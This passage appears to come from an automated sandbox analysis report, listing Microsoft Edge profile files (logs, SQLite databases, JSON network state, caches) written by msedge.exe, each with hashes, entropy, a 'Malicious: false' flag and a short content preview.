SHA-512:	A89D799C5B0F4668A27BA4C5ADF0840374B99A082CA5E3B89BB3B1D6BD0F6109DD5927DB8F89E8064D8ACA3B28B8ADC1705CDFA5F4F70FE901AB68C5912DDD67
Malicious:	false
Preview:	SNSS.......\. ............\. ......."\. ............\. ........\. ........]. ........]. .....!..]. ................................\. .]. .1..,...]. .$...2534a972_723e_4d8e_b229_134c50beb754...\. ........]. .....KA.........\. ....\. ........................\. .....................5..0...\. .&...{F44A76A6-556E-4DC8-8BF2-CF26F02D08AD}.....\. ........\. ........................]. ............]. .........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......F..WF+..G..WF+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.147690798379785
Encrypted:	false
SSDEEP:	6:iOrvkMrq2PFi23oH+Tcwt7Uh2ghZIFUtJvkMnZmwPvkM3kwOFi23oH+Tcwt7Uh2w:7XrvdZYebIhHh2FUtRn/j35wZYebIhHd
MD5:	B465DA03A0DD569A58727524EACA1612
SHA1:	217045478BE2E966F5DF7B90DFBF004D9BDBB27C
SHA-256:	44AE65453D44E5C071B35402D2073056787A2E15C26B37F1BC4C9BDBE8CFC4E5
SHA-512:	24E8C9A777CD0BE1FD73B51CF8C6B85CE0484C8FFEA3C17C8F7997BB737FB9AC3219C35D93EE9C2F6FC7115C2795B172C5AEC2C7A686B73D014A6045E4DE15B9
Malicious:	false
Preview:	2025/01/09-08:56:06.295 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:56:06.296 1b90 Recovering log #3.2025/01/09-08:56:06.298 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.147690798379785
Encrypted:	false
SSDEEP:	6:iOrvkMrq2PFi23oH+Tcwt7Uh2ghZIFUtJvkMnZmwPvkM3kwOFi23oH+Tcwt7Uh2w:7XrvdZYebIhHh2FUtRn/j35wZYebIhHd
MD5:	B465DA03A0DD569A58727524EACA1612
SHA1:	217045478BE2E966F5DF7B90DFBF004D9BDBB27C
SHA-256:	44AE65453D44E5C071B35402D2073056787A2E15C26B37F1BC4C9BDBE8CFC4E5
SHA-512:	24E8C9A777CD0BE1FD73B51CF8C6B85CE0484C8FFEA3C17C8F7997BB737FB9AC3219C35D93EE9C2F6FC7115C2795B172C5AEC2C7A686B73D014A6045E4DE15B9
Malicious:	false
Preview:	2025/01/09-08:56:06.295 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:56:06.296 1b90 Recovering log #3.2025/01/09-08:56:06.298 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.219604760371737
Encrypted:	false
SSDEEP:	12:7c+L+vdZYebvqBQFUtvm/ALV5wZYebvqBvJ:7cTbYebvZgHgYebvk
MD5:	CD44ECF53476AECC9C88F7DC2AAD5AD2
SHA1:	A617D3F44ABBC74E1FA08F5D5ABA38C229340B44
SHA-256:	B8FD97D5D7A069605A9B65058E4EA6D24ABC0054DFD4679E932AD05D10547B30
SHA-512:	D14BC0AFF13A981C23329EAF383571B13A168CDEDC1A2C3DDBCB019EB08837E8FA5BE64326404244B612F390184B6D1F028FBAFC4253D60E667B69B1F0AF11EB
Malicious:	false
Preview:	2025/01/09-08:56:07.110 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:56:07.111 1c7c Recovering log #3.2025/01/09-08:56:07.115 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.219604760371737
Encrypted:	false
SSDEEP:	12:7c+L+vdZYebvqBQFUtvm/ALV5wZYebvqBvJ:7cTbYebvZgHgYebvk
MD5:	CD44ECF53476AECC9C88F7DC2AAD5AD2
SHA1:	A617D3F44ABBC74E1FA08F5D5ABA38C229340B44
SHA-256:	B8FD97D5D7A069605A9B65058E4EA6D24ABC0054DFD4679E932AD05D10547B30
SHA-512:	D14BC0AFF13A981C23329EAF383571B13A168CDEDC1A2C3DDBCB019EB08837E8FA5BE64326404244B612F390184B6D1F028FBAFC4253D60E667B69B1F0AF11EB
Malicious:	false
Preview:	2025/01/09-08:56:07.110 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:56:07.111 1c7c Recovering log #3.2025/01/09-08:56:07.115 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5f84f9ea-954d-4bf9-8956-8af58532a66f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6a83c4a0-4198-474c-884a-de334cebcd3e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3642a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF373ca.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a48021d5-242f-43b9-bac1-8e6121496ca8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c09d84c4-8d6a-412f-8735-a6a786ee86fc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\eb49ba42-2325-4619-ad49-0ea57eed81af.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.268133967831229
Encrypted:	false
SSDEEP:	12:7QL+vdZYebvqBZFUtZB/QLV5wZYebvqBaJ:75bYebvygZ8gYebvL
MD5:	89935D8F8968E961EB212A7A03DD2862
SHA1:	DC5527171468BBB51F7D02E73018280A36BB91AC
SHA-256:	D98F85BCBCBB275EA05805CFAD68F2E44A5E69C5425E95D8017D7ED7728F3AA8
SHA-512:	CE7848455F01F6B381B18C2017AB7D5DAF3946AD873498DE2B86AEC0F11611DE3C319CB5AE48DF9B1074CFFA87AC743D963B9F3D7916F655F79FB2275B914ED2
Malicious:	false
Preview:	2025/01/09-08:56:27.373 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:56:27.374 1c7c Recovering log #3.2025/01/09-08:56:27.377 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.268133967831229
Encrypted:	false
SSDEEP:	12:7QL+vdZYebvqBZFUtZB/QLV5wZYebvqBaJ:75bYebvygZ8gYebvL
MD5:	89935D8F8968E961EB212A7A03DD2862
SHA1:	DC5527171468BBB51F7D02E73018280A36BB91AC
SHA-256:	D98F85BCBCBB275EA05805CFAD68F2E44A5E69C5425E95D8017D7ED7728F3AA8
SHA-512:	CE7848455F01F6B381B18C2017AB7D5DAF3946AD873498DE2B86AEC0F11611DE3C319CB5AE48DF9B1074CFFA87AC743D963B9F3D7916F655F79FB2275B914ED2
Malicious:	false
Preview:	2025/01/09-08:56:27.373 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:56:27.374 1c7c Recovering log #3.2025/01/09-08:56:27.377 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.226538626013154
Encrypted:	false
SSDEEP:	6:iOrvkUZSQL+q2PFi23oH+TcwtpIFUtJvkUZSGKWZmwPvkUcNAQLVkwOFi23oH+Tr:7ZZSQ+vdZYebmFUt7ZSGKW/9cNAQV5wl
MD5:	554BBA0BC3488CB44B292569D788C8B7
SHA1:	2812B5EC45C5E9F729F23D28F423DAEA33B20F28
SHA-256:	064E5BEF160C56D2A622E4ABC3B1BB5D0E7CCC15641219DF83A0F1DB2884BB4B
SHA-512:	E168BB71584C1B51D58780ACC73421678501B6B5614590292AF70A716860E46CE35A45EF7AAC87842BFDFADE6FD199CDB13833B334EEEDB53A4A9E21A15BF406
Malicious:	false
Preview:	2025/01/09-08:56:06.138 3ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:56:06.138 3ec Recovering log #3.2025/01/09-08:56:06.139 3ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.226538626013154
Encrypted:	false
SSDEEP:	6:iOrvkUZSQL+q2PFi23oH+TcwtpIFUtJvkUZSGKWZmwPvkUcNAQLVkwOFi23oH+Tr:7ZZSQ+vdZYebmFUt7ZSGKW/9cNAQV5wl
MD5:	554BBA0BC3488CB44B292569D788C8B7
SHA1:	2812B5EC45C5E9F729F23D28F423DAEA33B20F28
SHA-256:	064E5BEF160C56D2A622E4ABC3B1BB5D0E7CCC15641219DF83A0F1DB2884BB4B
SHA-512:	E168BB71584C1B51D58780ACC73421678501B6B5614590292AF70A716860E46CE35A45EF7AAC87842BFDFADE6FD199CDB13833B334EEEDB53A4A9E21A15BF406
Malicious:	false
Preview:	2025/01/09-08:56:06.138 3ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:56:06.138 3ec Recovering log #3.2025/01/09-08:56:06.139 3ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2650267664320842
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMdSAELyKOMq+8wH0hLUZsrhVumz:K0q+n0Jd9ELyKOMq+8I0hAOB
MD5:	E7FA44712CE49B6B5268F8DCAA90B5F6
SHA1:	E924DE569C86E2AC0614AFEF5AF644A5D90975DE
SHA-256:	D8D59060EE90F425F142688DC710BCA18317A72A20B32BE4F7CEB8349AA847E9
SHA-512:	2CB66748AEC90C8CB25B1D5D4B944432A156317B4BDB99E22DD28C2C4871BDA0D112B9698C50747FE0ACE30D9136C6FEDCDDDF0C299922BF4AB8187C839081B0
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4668187082509571
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LrQU4:v7doKsKuKZKlZNmu46yjx0LUU4
MD5:	D2229EC0D8984520F54CA1C57BFD8EBA
SHA1:	274B2875766D38F5F488542816CCA80EF06ABF97
SHA-256:	EA94AD8159F83A3A1B65D451E1F900E6FEA426498E14C0C0E50C5141C3F1756F
SHA-512:	663C150532419624D76885C4CA9CFF576C085637C705ED21A8B6CA75E1D488622C8FB48DF7FB10074A6E3379772B2C9C53C209EC525B18B6C30049030B759F88
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a24c46fc-aa7f-4cd2-804a-7b2f4cb91d14.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17628), with no line terminators
Category:	dropped
Size (bytes):	17632
Entropy (8bit):	5.486953921542516
Encrypted:	false
SSDEEP:	192:st6J99QTryDigabatSuyplsfb7IlN6x6v66kdjeDPYKwFwwTTVAEr3O8obV+FTZa:st6PGKSu4lsfb7i46ijfTFQbG9Qwbj90
MD5:	6C31EF47E9C2664D62D8D36ACBCDBD20
SHA1:	933CD4B7701D04D17CC45954E2F3DB5C7A3AC10E
SHA-256:	ED0F40F6F9145AA1F946614743A7F28EE4AE929210627FA0173412969C59524B
SHA-512:	73B2E22A0BDBAF2AA10C2C00961BD30377CF02752E6B6ABE37739A097BA046CC2AD47F53A9ECACC49C776F6805C795D4A586CC620EFDB53A5A806AEB55B7C483
Malicious:	false
